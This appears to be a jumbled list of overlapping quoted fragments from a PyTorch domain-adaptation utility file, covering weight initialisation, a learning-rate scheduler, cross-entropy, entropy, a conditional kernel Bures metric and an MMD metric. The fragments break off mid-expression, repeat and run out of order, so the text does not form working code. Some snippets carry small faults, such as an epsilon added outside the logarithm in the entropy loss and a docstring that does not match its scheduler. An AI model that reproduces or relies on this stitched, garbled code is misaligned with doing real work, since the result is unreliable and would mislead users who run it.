torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t =", "Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t,", "2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach()", "-1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0,", "G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s =", "sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt", "-\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm(", "torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt =", "2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t", "( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt", "fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs", "B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s", "S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) )", "!= -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def", "-1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x):", "to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad():", "= fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif", "(B_t + B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t =", "K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs", "return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate", "(H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s", "for batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob", "R_{st} ======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t =", "\"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif", "!= -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif", "inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor", "= m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0,", "D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach()", "== 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t", "Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist", "Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s)", "+ B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize", "= fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t())", "to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy =", "** (-power) i = 0 for param_group in optimizer.param_groups: param_group['lr'] = lr *", "CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return", "H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t", "return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss", "B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s,", "- (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s", "for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay *", "- (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s", "x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available():", "!= -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x", "= (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt =", "= num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t", "Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist #", "(-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s)", "utf-8 -*- import torch from torch.autograd import Variable import sys ################################## # Network", "lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct +=", "= H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #======", "(G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s +", "m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__", "+\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs =", "= (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist =", "(G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s =", "= FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset)", "(epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= #", "loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "gamma * iter_num) ** (-power) i = 0 for param_group in optimizer.param_groups: param_group['lr']", "+\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach()", "B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical", "= torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss", "= torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s)", "symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag())", "H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional", "fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear =", "= x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x", "G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t}", "to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def", "I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s =", "+\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs =", "Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss", "MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1)", "KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD", "= prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t,", "'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error:", "D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp()", "sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt", "P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type ==", "prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs =", "torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda()", "1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy", "coding: utf-8 -*- import torch from torch.autograd import Variable import sys ################################## #", "Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t", "NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy", "= (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys =", "+\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach()", "prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs", "fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type", "#====== R_{st} ======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t", "#====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t", "numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct", "V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() -", "classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d')", "(-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean() - 2*K_XtXs.mean() return MMD_dist", "every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma * iter_num) **", "-(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls,", "D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp()", "(-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp()", "power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch", "HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s)", "(1 + gamma * iter_num) ** (-power) i = 0 for param_group in", "= (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t", "K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() +", "-\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\", "2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s", "sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and", "= I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt -", "OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs", "to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def", "OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "-1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1", "if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct =", "m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or", "2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt =", "prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs", "K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs", "NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy", "classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0)", "prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s,", "= fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs", "matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach()", "-\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt =", "= torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s", "S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag())", "D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by", "m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname", "and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t =", "= (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} =======", "2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "= D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs =", "fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s =", "= NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0]", "= torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5)", "H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\", "def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X, lab) in enumerate(data_loader):", "- torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "- torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t)", "OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type ==", "parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') !=", "def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z:", "-*- coding: utf-8 -*- import torch from torch.autograd import Variable import sys ##################################", "= prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ 